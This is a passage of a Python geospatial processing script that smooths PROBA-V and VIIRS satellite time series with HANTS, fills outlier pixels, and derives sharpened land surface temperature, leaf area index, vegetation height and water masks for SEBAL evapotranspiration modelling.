fet = float(ws_para['B6'].value) # fit error tolerance (points deviating more than fet from the curve fit are rejected)
delta = float(ws_para['B7'].value) # small positive number (e.g. 0.1) to suppress high amplitudes
dod = float(ws_para['B8'].value) # degree of overdeterminedness (iteration stops once the number of points reaches the minimum required for curve fitting, plus dod); this is a safety measure
from SEBAL.hants import wa_gdal
# Run
wa_gdal.run_HANTS(input_folder_HANTS_VAR, name_format,
start_date, end_date, latlim, lonlim, cellsize, nc_path_albedo,
nb, nf, HiLo, low, high, fet, dod, delta,
proj, -9999.0, rasters_path_out, export_hants_only=True)
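# For reference, a minimal sketch of the harmonic fitting idea behind HANTS
# (assumptions: plain unweighted least squares and no outlier rejection; the
# real wa_gdal.run_HANTS iterates and rejects outliers using HiLo, fet and dod).
# The helper below is illustrative only and is not called by this script.
def _harmonic_fit_sketch(values, times, n_freq, base_period):
    # Build a design matrix with a constant term plus n_freq harmonics
    t = np.asarray(times, dtype=float)
    A = np.ones((len(t), 1 + 2 * n_freq))
    for k in range(1, n_freq + 1):
        A[:, 2 * k - 1] = np.cos(2 * np.pi * k * t / base_period)
        A[:, 2 * k] = np.sin(2 * np.pi * k * t / base_period)
    # Least-squares fit, then reconstruct the smoothed time series
    coeffs = np.linalg.lstsq(A, np.asarray(values, dtype=float))[0]
    return A.dot(coeffs)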
###################################################################################################################
################################################### post HANTS part 5 #############################################
###################################################################################################################
############################################# Create Outlier maps for PROBA-V #######################################
# Create output folder if not exists
output_folder_HANTS_outliers_PROBAV = os.path.join(temp_folder_PreSEBAL, 'Outliers_PROBAV')
if not os.path.exists(output_folder_HANTS_outliers_PROBAV):
os.mkdir(output_folder_HANTS_outliers_PROBAV)
fh = Dataset(nc_path_albedo, mode='r')
Var = fh.variables.keys()[-1]
lat = fh.variables[fh.variables.keys()[1]][:]
lon = fh.variables[fh.variables.keys()[2]][:]
time = fh.variables[fh.variables.keys()[3]][:]
minimum_lon = np.min(lon)
maximum_lat = np.max(lat)
diff_lon = lon[1] - lon[0]
diff_lat = lat[1] - lat[0]
if not ('shape' in locals() and 'dest' in locals()):
Example_file = os.path.join(output_folder_preprocessing_VAR, Back_name)
dest = gdal.Open(Example_file)
ncol = dest.RasterXSize # Get the reprojected dem column size
nrow = dest.RasterYSize # Get the reprojected dem row size
shape=[ncol, nrow]
for i in range(0,int(np.shape(time)[0])):
time_now = time[i]
data = fh.variables['outliers'][:,:,i]
geo = tuple([minimum_lon, diff_lon, 0, maximum_lat, 0, diff_lat])
name_out = os.path.join(output_folder_HANTS_outliers_PROBAV, 'Outliers_PROBAV_%s.tif' %time_now)
SEBAL.save_GeoTiff_proy(dest, data, name_out, shape, nband=1)
############################################# Create ALBEDO and NDVI #########################################
# Create the end thermal files date by date
for date in Dates:
# Define date
year = date.year
month = date.month
day = date.day
# input filenames needed for creating end thermal file
filename_outliers = os.path.join(output_folder_HANTS_outliers_PROBAV,"Outliers_PROBAV_%d%02d%02d.tif" %(year,month,day))
VAR = 'Albedo'
input_folder_PreSEBAL_ALBEDO = os.path.join(temp_folder_PreSEBAL, VAR + "_HANTS")
filename_Albedo_original = os.path.join(Albedo_outfolder, "%s_PROBAV_%d%02d%02d.tif" %(VAR,year,month,day))
filename_Albedo_HANTS = os.path.join(input_folder_PreSEBAL_ALBEDO, "%s_PROBAV_%d%02d%02d.tif" %(VAR,year,month,day))
VAR = 'NDVI'
input_folder_PreSEBAL_NDVI = os.path.join(temp_folder_PreSEBAL, VAR + "_HANTS")
filename_NDVI_original = os.path.join(NDVI_outfolder, "%s_PROBAV_%d%02d%02d.tif" %(VAR,year,month,day))
filename_NDVI_HANTS = os.path.join(input_folder_PreSEBAL_NDVI, "%s_PROBAV_%d%02d%02d.tif" %(VAR,year,month,day))
# Open the input filenames
dest_outliers = gdal.Open(filename_outliers)
dest_PROBAV_ALBEDO = gdal.Open(filename_Albedo_original)
dest_PROBAV_NDVI = gdal.Open(filename_NDVI_original)
dest_HANTS_ALBEDO = gdal.Open(filename_Albedo_HANTS)
dest_HANTS_NDVI = gdal.Open(filename_NDVI_HANTS)
# If original exists, this will be the basis for the end thermal map
if dest_PROBAV_ALBEDO is not None:
# Open arrays of the input files
Array_outliers = dest_outliers.GetRasterBand(1).ReadAsArray()[:,:]
Array_ALBEDO_original = dest_PROBAV_ALBEDO.GetRasterBand(1).ReadAsArray()
Array_ALBEDO_HANTS = dest_HANTS_ALBEDO.GetRasterBand(1).ReadAsArray()[:,:]
Array_NDVI_original = dest_PROBAV_NDVI.GetRasterBand(1).ReadAsArray()
Array_NDVI_HANTS = dest_HANTS_NDVI.GetRasterBand(1).ReadAsArray()[:,:]
# Create outlier mask: remap so that bad (outlier) pixels become 1 and good
# pixels become 0, the orientation expected by Create_Buffer below
Array_outliers[Array_outliers==-9999.] = 0
Array_outliers_mask = np.zeros(np.shape(Array_outliers))
Array_outliers_mask[Array_outliers==1.]=0
Array_outliers_mask[Array_outliers==0.]=1
Array_outliers_mask[Array_outliers_mask==0]=2
Array_outliers_mask[Array_outliers_mask==1]=0
Array_outliers_mask[Array_outliers_mask==2]=1
# Create a buffer zone around the bad pixels, then flip the mask back so that
# good pixels are 1 and (buffered) bad pixels are 0
Array_outliers_mask = Create_Buffer(Array_outliers_mask)
Array_outliers_mask[Array_outliers_mask==1] = 2
Array_outliers_mask[Array_outliers_mask==0] = 1
Array_outliers_mask[Array_outliers_mask==2] = 0
# If there are more than 300 good pixels
if np.nansum(Array_outliers_mask) > 300:
# Use the mask to find the good original pixels and HANTS pixels
Array_ALBEDO_original_mask_nan = Array_ALBEDO_original * Array_outliers_mask
Array_ALBEDO_HANTS_mask_nan = Array_ALBEDO_HANTS * Array_outliers_mask
Array_NDVI_original_mask_nan = Array_NDVI_original * Array_outliers_mask
Array_NDVI_HANTS_mask_nan = Array_NDVI_HANTS * Array_outliers_mask
# Create a 1D array of those pixels
Array_ALBEDO_original_mask_nan_flatten = Array_ALBEDO_original_mask_nan.flatten()
Array_ALBEDO_HANTS_mask_nan_flatten = Array_ALBEDO_HANTS_mask_nan.flatten()
Array_NDVI_original_mask_nan_flatten = Array_NDVI_original_mask_nan.flatten()
Array_NDVI_HANTS_mask_nan_flatten = Array_NDVI_HANTS_mask_nan.flatten()
# Remove pixels with high and low values
Array_ALBEDO_HANTS_mask_nan_flatten[Array_ALBEDO_HANTS_mask_nan_flatten<-0.2] = np.nan
Array_ALBEDO_HANTS_mask_nan_flatten[Array_ALBEDO_HANTS_mask_nan_flatten>0.6] = np.nan
Array_ALBEDO_original_mask_nan_flatten[Array_ALBEDO_original_mask_nan_flatten<-0.2] = np.nan
Array_ALBEDO_original_mask_nan_flatten[Array_ALBEDO_original_mask_nan_flatten>0.6] = np.nan
Array_NDVI_HANTS_mask_nan_flatten[Array_NDVI_HANTS_mask_nan_flatten<-0.2] = np.nan
Array_NDVI_HANTS_mask_nan_flatten[Array_NDVI_HANTS_mask_nan_flatten>0.6] = np.nan
Array_NDVI_original_mask_nan_flatten[Array_NDVI_original_mask_nan_flatten<-0.2] = np.nan
Array_NDVI_original_mask_nan_flatten[Array_NDVI_original_mask_nan_flatten>0.6] = np.nan
# Remove entries that are nan in both arrays (the nan-tolerant statistics below handle any remaining nans)
Array_ALBEDO_original_mask_nan_flatten2 = Array_ALBEDO_original_mask_nan_flatten[np.logical_or(~np.isnan(Array_ALBEDO_original_mask_nan_flatten),~np.isnan(Array_ALBEDO_HANTS_mask_nan_flatten))]
Array_ALBEDO_HANTS_mask_nan_flatten2 = Array_ALBEDO_HANTS_mask_nan_flatten[np.logical_or(~np.isnan(Array_ALBEDO_original_mask_nan_flatten),~np.isnan(Array_ALBEDO_HANTS_mask_nan_flatten))]
Array_NDVI_original_mask_nan_flatten2 = Array_NDVI_original_mask_nan_flatten[np.logical_or(~np.isnan(Array_NDVI_original_mask_nan_flatten),~np.isnan(Array_NDVI_HANTS_mask_nan_flatten))]
Array_NDVI_HANTS_mask_nan_flatten2 = Array_NDVI_HANTS_mask_nan_flatten[np.logical_or(~np.isnan(Array_NDVI_HANTS_mask_nan_flatten),~np.isnan(Array_NDVI_original_mask_nan_flatten))]
Array_ALBEDO_original_mask_nan_flatten = Array_ALBEDO_original_mask_nan_flatten2
Array_ALBEDO_HANTS_mask_nan_flatten = Array_ALBEDO_HANTS_mask_nan_flatten2
Array_NDVI_original_mask_nan_flatten = Array_NDVI_original_mask_nan_flatten2
Array_NDVI_HANTS_mask_nan_flatten = Array_NDVI_HANTS_mask_nan_flatten2
# Remove all zero values
Array_ALBEDO_original_mask_nan_flatten_without_zero =Array_ALBEDO_original_mask_nan_flatten[Array_ALBEDO_original_mask_nan_flatten != 0.0]
Array_NDVI_original_mask_nan_flatten_without_zero =Array_NDVI_original_mask_nan_flatten[Array_NDVI_original_mask_nan_flatten != 0.0]
# Calculate the 40th and 90th percentiles of the good pixels in the original arrays
Array_ALBEDO_original_mask_value_cold = np.nanpercentile(Array_ALBEDO_original_mask_nan_flatten_without_zero,40)
Array_ALBEDO_original_mask_value_hot = np.nanpercentile(Array_ALBEDO_original_mask_nan_flatten_without_zero,90)
Array_NDVI_original_mask_value_cold = np.nanpercentile(Array_NDVI_original_mask_nan_flatten_without_zero,40)
Array_NDVI_original_mask_value_hot = np.nanpercentile(Array_NDVI_original_mask_nan_flatten_without_zero,90)
# Exclude the coldest and hottest pixel values in both 1D arrays (this removes large areas of sea)
Array_ALBEDO_HANTS_mask_nan_flatten_exc_coldest = Array_ALBEDO_HANTS_mask_nan_flatten[np.logical_and(Array_ALBEDO_original_mask_nan_flatten > Array_ALBEDO_original_mask_value_cold,Array_ALBEDO_original_mask_nan_flatten < Array_ALBEDO_original_mask_value_hot)]
Array_ALBEDO_original_mask_nan_flatten_exc_coldest = Array_ALBEDO_original_mask_nan_flatten[np.logical_and(Array_ALBEDO_original_mask_nan_flatten > Array_ALBEDO_original_mask_value_cold,Array_ALBEDO_original_mask_nan_flatten < Array_ALBEDO_original_mask_value_hot)]
Array_NDVI_HANTS_mask_nan_flatten_exc_coldest = Array_NDVI_HANTS_mask_nan_flatten[np.logical_and(Array_NDVI_original_mask_nan_flatten > Array_NDVI_original_mask_value_cold,Array_NDVI_original_mask_nan_flatten < Array_NDVI_original_mask_value_hot)]
Array_NDVI_original_mask_nan_flatten_exc_coldest = Array_NDVI_original_mask_nan_flatten[np.logical_and(Array_NDVI_original_mask_nan_flatten > Array_NDVI_original_mask_value_cold,Array_NDVI_original_mask_nan_flatten < Array_NDVI_original_mask_value_hot)]
# Calculate the mean of those arrays
Ave_ALBEDO_HANTS = np.nanmean(Array_ALBEDO_HANTS_mask_nan_flatten_exc_coldest)
Ave_ALBEDO_original = np.nanmean(Array_ALBEDO_original_mask_nan_flatten_exc_coldest)
Ave_NDVI_HANTS = np.nanmean(Array_NDVI_HANTS_mask_nan_flatten_exc_coldest)
Ave_NDVI_original = np.nanmean(Array_NDVI_original_mask_nan_flatten_exc_coldest)
# Calculate the correction factor for the simulated image
Factor_Albedo = Ave_ALBEDO_original/Ave_ALBEDO_HANTS
Factor_NDVI = Ave_NDVI_original/Ave_NDVI_HANTS
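# e.g. if the good original pixels average 0.30 while the HANTS simulation
# averages 0.25 over the same pixels, the factor 0.30 / 0.25 = 1.2 lifts the
# whole simulated image to the level of the observations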
# Apply this factor over the simulated HANTS image
Array_ALBEDO_HANTS_Corrected = Array_ALBEDO_HANTS * Factor_Albedo
Array_NDVI_HANTS_Corrected = Array_NDVI_HANTS * Factor_NDVI
# Create the end array by replacing the bad pixels of the original array with the corrected simulated HANTS values
End_array_Albedo = np.ones(np.shape(Array_outliers_mask)) * np.nan
End_array_Albedo[Array_outliers_mask==0] = Array_ALBEDO_HANTS_Corrected[Array_outliers_mask==0]
End_array_Albedo[Array_outliers_mask==1] = Array_ALBEDO_original[Array_outliers_mask==1]
End_array_NDVI = np.ones(np.shape(Array_outliers_mask)) * np.nan
End_array_NDVI[Array_outliers_mask==0] = Array_NDVI_HANTS_Corrected[Array_outliers_mask==0]
End_array_NDVI[Array_outliers_mask==1] = Array_NDVI_original[Array_outliers_mask==1]
# If the original image is too bad, replace the whole image with the simulated HANTS image
else:
End_array_Albedo = Array_ALBEDO_HANTS
End_array_NDVI = Array_NDVI_HANTS
# Get the geolocation information of the image
geo = dest_PROBAV_ALBEDO.GetGeoTransform()
proj = dest_outliers.GetProjection()
# If there is no original image, use the simulated HANTS image
else:
Array_ALBEDO_HANTS = dest_HANTS_ALBEDO.GetRasterBand(1).ReadAsArray()
End_array_Albedo = Array_ALBEDO_HANTS
Array_NDVI_HANTS = dest_HANTS_NDVI.GetRasterBand(1).ReadAsArray()
End_array_NDVI = Array_NDVI_HANTS
dest_test = None
i = 0
while dest_test is None:
# Get the date of the first image that exists to get the geolocation information
date2 = Dates[i]
year2 = date2.year
month2= date2.month
day2 = date2.day
try:
filename_ALBEDO_original2 = os.path.join(input_folder_PreSEBAL_ALBEDO, "Albedo_PROBAV_%d%02d%02d.tif" %(year2,month2,day2))
dest_test = gdal.Open(filename_ALBEDO_original2)
geo = dest_test.GetGeoTransform()
proj = dest_test.GetProjection()
except:
i+=1
# Save the end array
output_name_end_ALBEDO = os.path.join(ALBEDO_outfolder_end, "Albedo_PROBAV_%d%02d%02d.tif"%(year,month,day))
SEBAL.save_GeoTiff_proy(dest, End_array_Albedo, output_name_end_ALBEDO, shape, nband=1)
output_name_end_NDVI = os.path.join(NDVI_outfolder_end, "NDVI_PROBAV_%d%02d%02d.tif"%(year,month,day))
SEBAL.save_GeoTiff_proy(dest, End_array_NDVI, output_name_end_NDVI, shape, nband=1)
############################################# Create Outlier maps for VIIRS #########################################
# Create output folder if not exists
output_folder_HANTS_outliers_VIIRS = os.path.join(temp_folder_PreSEBAL, 'Outliers_VIIRS')
if not os.path.exists(output_folder_HANTS_outliers_VIIRS):
os.mkdir(output_folder_HANTS_outliers_VIIRS)
fh = Dataset(nc_path_TB, mode='r')
Var = fh.variables.keys()[-1]
lat = fh.variables[fh.variables.keys()[1]][:]
lon = fh.variables[fh.variables.keys()[2]][:]
time = fh.variables[fh.variables.keys()[3]][:]
minimum_lon = np.min(lon)
maximum_lat = np.max(lat)
diff_lon = lon[1] - lon[0]
diff_lat = lat[1] - lat[0]
if not ('shape' in locals() and 'dest' in locals()):
Example_file = os.path.join(output_folder_preprocessing_THERM,Back_name_TB)
dest = gdal.Open(Example_file)
ncol = dest.RasterXSize # Get the reprojected dem column size
nrow = dest.RasterYSize # Get the reprojected dem row size
shape=[ncol, nrow]
for i in range(0,int(np.shape(time)[0])):
time_now = time[i]
data = fh.variables['outliers'][:,:,i]
geo = tuple([minimum_lon, diff_lon, 0, maximum_lat, 0, diff_lat])
name_out = os.path.join(output_folder_HANTS_outliers_VIIRS, 'Outliers_VIIRS_%s.tif' %time_now)
SEBAL.save_GeoTiff_proy(dest, data, name_out, shape, nband=1)
############################################# Create end thermal #########################################
# Create the end thermal files date by date
for date in Dates:
# Define date
year = date.year
month = date.month
day = date.day
# input filenames needed for creating end thermal file
filename_outliers = os.path.join(output_folder_HANTS_outliers_VIIRS,"Outliers_VIIRS_%d%02d%02d.tif" %(year,month,day))
filename_VIIRS_original = os.path.join(input_folder_HANTS_THERM, "Surface_Temperature_VIIRS_%d%02d%02d.tif" %(year,month,day))
filename_VIIRS_HANTS = os.path.join(temp_folder_PreSEBAL, THERM + "_HANTS", "Surface_Temperature_VIIRS_%d%02d%02d.tif" %(year,month,day))
# Open the input filenames
dest_outliers = gdal.Open(filename_outliers)
dest_VIIRS_original = gdal.Open(filename_VIIRS_original)
dest_VIIRS_HANTS = gdal.Open(filename_VIIRS_HANTS)
# If original exists, this will be the basis for the end thermal map
if dest_VIIRS_original is not None:
# Open arrays of the input files
Array_outliers = dest_outliers.GetRasterBand(1).ReadAsArray()[:,:]
Array_VIIRS_original = dest_VIIRS_original.GetRasterBand(1).ReadAsArray()
Array_VIIRS_HANTS = dest_VIIRS_HANTS.GetRasterBand(1).ReadAsArray()[:,:]
# Create outlier mask: remap so that bad (outlier) pixels become 1 and good
# pixels become 0, the orientation expected by Create_Buffer below
Array_outliers[Array_outliers==-9999.] = 0
Array_outliers_mask = np.zeros(np.shape(Array_outliers))
Array_outliers_mask[Array_outliers==1.]=0
Array_outliers_mask[Array_outliers==0.]=1
Array_outliers_mask[Array_outliers_mask==0]=2
Array_outliers_mask[Array_outliers_mask==1]=0
Array_outliers_mask[Array_outliers_mask==2]=1
# Create a buffer zone around the bad pixels, then flip the mask back so that
# good pixels are 1 and (buffered) bad pixels are 0
Array_outliers_mask = Create_Buffer(Array_outliers_mask)
Array_outliers_mask[Array_outliers_mask==1] = 2
Array_outliers_mask[Array_outliers_mask==0] = 1
Array_outliers_mask[Array_outliers_mask==2] = 0
# If there are more than 300 good pixels
if np.nansum(Array_outliers_mask) > 300:
# Use the mask to find the good original pixels and HANTS pixels
Array_VIIRS_original_mask_nan = Array_VIIRS_original * Array_outliers_mask
Array_VIIRS_HANTS_mask_nan = Array_VIIRS_HANTS * Array_outliers_mask
# Create a 1D array of those pixels
Array_VIIRS_original_mask_nan_flatten = Array_VIIRS_original_mask_nan.flatten()
Array_VIIRS_HANTS_mask_nan_flatten = Array_VIIRS_HANTS_mask_nan.flatten()
# Remove pixels with high and low values
Array_VIIRS_HANTS_mask_nan_flatten[Array_VIIRS_HANTS_mask_nan_flatten<250] = np.nan
Array_VIIRS_HANTS_mask_nan_flatten[Array_VIIRS_HANTS_mask_nan_flatten>350] = np.nan
Array_VIIRS_original_mask_nan_flatten[Array_VIIRS_original_mask_nan_flatten<250] = np.nan
Array_VIIRS_original_mask_nan_flatten[Array_VIIRS_original_mask_nan_flatten>350] = np.nan
# Remove entries that are nan in both arrays (the nan-tolerant statistics below handle any remaining nans)
Array_VIIRS_original_mask_no_nan_flatten = Array_VIIRS_original_mask_nan_flatten[np.logical_or(~np.isnan(Array_VIIRS_original_mask_nan_flatten),~np.isnan(Array_VIIRS_HANTS_mask_nan_flatten))]
Array_VIIRS_HANTS_mask_no_nan_flatten = Array_VIIRS_HANTS_mask_nan_flatten[np.logical_or(~np.isnan(Array_VIIRS_original_mask_nan_flatten),~np.isnan(Array_VIIRS_HANTS_mask_nan_flatten))]
# Remove all zero values
Array_VIIRS_original_mask_nan_flatten_without_zero =Array_VIIRS_original_mask_no_nan_flatten[Array_VIIRS_original_mask_no_nan_flatten>0]
# Calculate the 40th and 90th percentiles of the good pixels in the original array
Array_VIIRS_original_mask_value_cold = np.nanpercentile(Array_VIIRS_original_mask_nan_flatten_without_zero,40)
Array_VIIRS_original_mask_value_hot = np.nanpercentile(Array_VIIRS_original_mask_nan_flatten_without_zero,90)
# Exclude the coldest and hottest pixel values in both 1D arrays (this removes large areas of sea)
Array_VIIRS_HANTS_mask_nan_flatten_exc_coldest = Array_VIIRS_HANTS_mask_no_nan_flatten[np.logical_and(Array_VIIRS_original_mask_no_nan_flatten > Array_VIIRS_original_mask_value_cold,Array_VIIRS_original_mask_no_nan_flatten < Array_VIIRS_original_mask_value_hot)]
Array_VIIRS_original_mask_nan_flatten_exc_coldest = Array_VIIRS_original_mask_no_nan_flatten[np.logical_and(Array_VIIRS_original_mask_no_nan_flatten > Array_VIIRS_original_mask_value_cold,Array_VIIRS_original_mask_no_nan_flatten < Array_VIIRS_original_mask_value_hot)]
# Calculate the mean of those arrays
Ave_VIIRS_HANTS = np.nanmean(Array_VIIRS_HANTS_mask_nan_flatten_exc_coldest)
Ave_VIIRS_original = np.nanmean(Array_VIIRS_original_mask_nan_flatten_exc_coldest)
# Calculate the correction factor for the simulated image
Factor = Ave_VIIRS_original/Ave_VIIRS_HANTS
# Apply this factor over the simulated HANTS image
Array_VIIRS_HANTS_Corrected = Array_VIIRS_HANTS * Factor
# Create the end array by replacing the bad pixels of the original array with the corrected simulated HANTS values
End_array = np.ones(np.shape(Array_outliers_mask)) * np.nan
End_array[Array_outliers_mask==0] = Array_VIIRS_HANTS_Corrected[Array_outliers_mask==0]
End_array[Array_outliers_mask==1] = Array_VIIRS_original[Array_outliers_mask==1]
# If the original image is too bad, replace the whole image with the simulated HANTS image
else:
End_array = Array_VIIRS_HANTS
# Get the geolocation information of the image
geo = dest_VIIRS_original.GetGeoTransform()
proj = dest_outliers.GetProjection()
# If there is no original image, use the simulated HANTS image
else:
Array_VIIRS_HANTS = dest_VIIRS_HANTS.GetRasterBand(1).ReadAsArray()
End_array = Array_VIIRS_HANTS
dest_test = None
i = 0
while dest_test is None:
# Get the date of the first image that exists to get the geolocation information
date2 = Dates[i]
year2 = date2.year
month2= date2.month
day2 = date2.day
try:
filename_VIIRS_original2 = os.path.join(input_folder_HANTS_THERM, "Surface_Temperature_VIIRS_%d%02d%02d.tif" %(year2,month2,day2))
dest_test = gdal.Open(filename_VIIRS_original2)
geo = dest_test.GetGeoTransform()
proj = dest_test.GetProjection()
except:
i+=1
# Save the end array
output_name_end_LST = os.path.join(temp_folder_PreSEBAL_LST, "VIIRS_LST_%d%02d%02d.tif"%(year,month,day))
SEBAL.save_GeoTiff_proy(dest, End_array, output_name_end_LST, shape, nband=1)
###################################################################################################################
###################################################### preSEBAL continue ##########################################
###################################################################################################################
############################################### Apply thermal sharpening ##########################################
print('---------------------------------------------------------')
print('-------------------- Downscale VIIRS --------------------')
print('---------------------------------------------------------')
# Upscale VIIRS and PROBA-V to 400m
pixel_spacing_upscale = 400
# Open the General_Input sheet
ws = wb['General_Input']
# Extract the input and output folder, and Image type from the excel file
DEM_fileName = str(ws['E2'].value)
ws = wb['VIIRS_PROBAV_Input']
UTM_Zone = int(str(ws['G2'].value))
# Reproject from geographic coordinates to UTM
# 1) DEM - the original DEM coordinates are geographic (lat, lon)
proyDEM_fileName_100 = os.path.join(temp_folder_PreSEBAL,'DEM_100.tif')
dest, ulx_dem, lry_dem, lrx_dem, uly_dem, epsg_to = SEBAL.reproject_dataset(
DEM_fileName, pixel_spacing = 100, UTM_Zone=UTM_Zone)
band = dest.GetRasterBand(1) # Get the reprojected dem band
ncol = dest.RasterXSize # Get the reprojected dem column size
nrow = dest.RasterYSize # Get the reprojected dem row size
shape=[ncol, nrow]
DEM = band.ReadAsArray()
# Save DEM file with the 100 meter resolution
SEBAL.save_GeoTiff_proy(dest, DEM, proyDEM_fileName_100, shape, nband=1)
# Create upscaled DEM
proyDEM_fileName_400 = os.path.join(temp_folder_PreSEBAL,'DEM_400.tif')
dest_400, ulx_dem_400, lry_dem_400, lrx_dem_400, uly_dem_400, epsg_to = SEBAL.reproject_dataset(
DEM_fileName, pixel_spacing_upscale, UTM_Zone = UTM_Zone)
# Get the spatial parameters of the upscaled array
DEM_400 = dest_400.GetRasterBand(1).ReadAsArray()
Y_raster_size_400 = dest_400.RasterYSize
X_raster_size_400 = dest_400.RasterXSize
shape_400=([X_raster_size_400, Y_raster_size_400])
# Save DEM file with the 400 meter resolution
SEBAL.save_GeoTiff_proy(dest_400, DEM_400, proyDEM_fileName_400, shape_400, nband=1)
for date in Dates:
surf_temp_fileName = os.path.join(temp_folder_PreSEBAL, 'Surf_temp_After_TS_%d%02d%02d.tif' %(date.year, date.month, date.day))
temp_surface_100_fileName_beforeTS = os.path.join(temp_folder_PreSEBAL_LST,'VIIRS_LST_%d%02d%02d.tif' %(date.year, date.month, date.day))
################################ Thermal Sharpening #####################################################
# Define filename
file_NDVI_after_HANTS = os.path.join(NDVI_outfolder_end, 'NDVI_PROBAV_%d%02d%02d.tif' %(date.year, date.month, date.day))
# Open the NDVI and LST datasets
dest_NDVI = gdal.Open(file_NDVI_after_HANTS)
dest_LST = gdal.Open(temp_surface_100_fileName_beforeTS)
# Open NDVI array
NDVI = dest_NDVI.GetRasterBand(1).ReadAsArray()
# Open LST array
LST = dest_LST.GetRasterBand(1).ReadAsArray()
# Upscale thermal band VIIRS from 100m to 400m
VIIRS_Upscale, ulx_dem, lry_dem, lrx_dem, uly_dem, epsg_to = SEBAL.reproject_dataset_example(
temp_surface_100_fileName_beforeTS, proyDEM_fileName_400)
data_Temp_Surf_400 = VIIRS_Upscale.GetRasterBand(1).ReadAsArray()
# Upscale PROBA-V NDVI from 100m to 400m
NDVI_PROBAV_Upscale, ulx_dem, lry_dem, lrx_dem, uly_dem, epsg_to = SEBAL.reproject_dataset_example(
file_NDVI_after_HANTS, proyDEM_fileName_400)
data_NDVI_400 = NDVI_PROBAV_Upscale.GetRasterBand(1).ReadAsArray()
# Define the width of the moving window box
Box=9
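# (presumably the NDVI-LST regression inside Thermal_Sharpening uses a moving
# window of 9 x 9 pixels at 400 m resolution, i.e. roughly a 3.6 x 3.6 km
# neighbourhood)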
# Apply the surface temperature sharpening
temp_surface_sharpened = SEBAL.Thermal_Sharpening(data_Temp_Surf_400, data_NDVI_400, NDVI, Box, NDVI_PROBAV_Upscale, output_folder, proyDEM_fileName_100, shape, dest, surf_temp_fileName)
# Create Water mask based on HANTS NDVI output
water_mask = np.zeros((shape[1], shape[0]))
water_mask[NDVI<0.0]=1
# Split the temporary water mask into a snow mask and a water mask using surface temperature
Snow_Mask_PROBAV, water_mask, ts_moist_veg_min, NDVI_max, NDVI_std = SEBAL.CalculateSnowWaterMask(NDVI,shape,water_mask,temp_surface_sharpened)
# Replace water values
temp_surface_sharpened[water_mask==1] = LST[water_mask == 1]
temp_surface_sharpened = np.where(np.isnan(temp_surface_sharpened), LST, temp_surface_sharpened)
surf_temp_fileName = os.path.join(output_folder_HANTS_end_sharp, 'LST_surface_temp_sharpened_%d%02d%02d.tif' %(date.year, date.month, date.day))
SEBAL.save_GeoTiff_proy(dest, temp_surface_sharpened, surf_temp_fileName, shape, nband=1)
################################################## Calculate LAI ##################################################
# Open the NDVI dataset
dest_NDVI = gdal.Open(file_NDVI_after_HANTS)
# Open NDVI array
NDVI = dest_NDVI.GetRasterBand(1).ReadAsArray()
LAI_FileName = os.path.join(LAI_outfolder,'LAI_%d%02d%02d.tif' %(date.year, date.month, date.day))
# Calculate LAI
FPAR, tir_emis, Nitrogen, vegt_cover, LAI, b10_emissivity = SEBAL.Calc_vegt_para(NDVI,water_mask, shape)
SEBAL.save_GeoTiff_proy(dest, LAI, LAI_FileName, shape, nband=1)
################################ Calculate the Vegetation height ########################
# Open the Vegetation_Height sheet of the preprocessing excel file
ws_veg = wb_veg['Vegetation_Height']
# Define output name for the LandUse map
dst_FileName = os.path.join(output_folder,'LU.tif')
# Open LU data
LU_dest = gdal.Open(LU_data_FileName)
LU_data = LU_dest.GetRasterBand(1).ReadAsArray()
# Reproject the LAI to the same projection as LU
dest1, ulx, lry, lrx, uly, epsg_to = SEBAL.reproject_dataset_example(LAI_FileName, LU_data_FileName) ## input after HANTS
LAI_proj = dest1.GetRasterBand(1).ReadAsArray()
# Read out the excel file coefficient numbers
Array = np.zeros([ws_veg.max_row-1,4])
for j in ['A','C','D','E']:
j_number={'A' : 0, 'C' : 1, 'D' : 2, 'E' : 3}
for i in range(2,ws_veg.max_row+1):
Value = (ws_veg['%s%s' %(j,i)].value)
Array[i-2, j_number[j]] = Value
# Create maps with the coefficient numbers for the right land cover
coeff = np.zeros([int(np.shape(LU_data)[0]),int(np.shape(LU_data)[1]),3])
for coeff_nmbr in range(0,3):
for Class in range(0,len(Array)):
coeff[LU_data==Array[Class,0],coeff_nmbr] = Array[Class,coeff_nmbr+1]
# Get some dimensions of the projected dataset
band_data = dest1.GetRasterBand(1)
ncol_data = dest1.RasterXSize
nrow_data = dest1.RasterYSize
shape_data=[ncol_data, nrow_data]
# Calculate the vegetation height in the LU projection
Veg_Height_proj = coeff[:,:,0] * np.power(LAI_proj,2) + coeff[:,:,1] * LAI_proj + coeff[:,:,2]
Veg_Height_proj = np.clip(Veg_Height_proj, 0, 600)
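# i.e. per land-use class the height follows h = a * LAI^2 + b * LAI + c,
# with (a, b, c) taken from columns C, D and E of the Vegetation_Height sheet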
# Save the vegetation height in the LU projection in the temporary directory
Veg_Height_proj_FileName = os.path.join(temp_folder_PreSEBAL,'Veg_Height_proj.tif')
SEBAL.save_GeoTiff_proy(dest1, Veg_Height_proj, Veg_Height_proj_FileName, shape_data, nband=1)
# Reproject the Veg_height to the LAI projection
dest, ulx, lry, lrx, uly, epsg_to = SEBAL.reproject_dataset_example(Veg_Height_proj_FileName, LAI_FileName)
# Get some dimensions of the original dataset
band_data = dest.GetRasterBand(1)
ncol_data = dest.RasterXSize
nrow_data = dest.RasterYSize
# Open the Veg_height with the same projection as LAI
Veg_Height = band_data.ReadAsArray(0, 0, ncol_data, nrow_data)
Veg_Height[Veg_Height == 0] = 0.4
# Save Vegetation Height in the end folder
dst_FileName = os.path.join(output_folder_HANTS_end_Veg,'Vegetation_Height_%d%02d%02d.tif' %(date.year, date.month, date.day))
SEBAL.save_GeoTiff_proy(dest, Veg_Height, dst_FileName, shape, nband=1)
######################## calculate Water Mask #########################
# Collect all the water masks
os.chdir(WaterMask_outfolder)
re_water_mask = glob.glob('Water_Mask*.tif')
# Loop over all the files
for water_mask_filename in re_water_mask:
# Create the filepath to the water mask
water_mask_filepath = os.path.join(WaterMask_outfolder,water_mask_filename)
# Open Array
water_mask_dest = gdal.Open(water_mask_filepath)
# If the total water mask array does not exist yet, create it
if not 'water_mask_array' in locals():
water_mask_array = np.zeros([water_mask_dest.RasterYSize, water_mask_dest.RasterXSize])
# Add all the water masks
water_mask_array += water_mask_dest.GetRasterBand(1).ReadAsArray()
# A pixel ends up as water in the end mask if more than 50 percent of the masks define it as water
water_mask_array_per = water_mask_array/len(re_water_mask)
water_mask_array_end = np.zeros([water_mask_dest.RasterYSize, water_mask_dest.RasterXSize])
water_mask_array_end[water_mask_array_per > 0.5] = 1
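# e.g. with 10 daily masks, a pixel flagged as water in 6 of them scores
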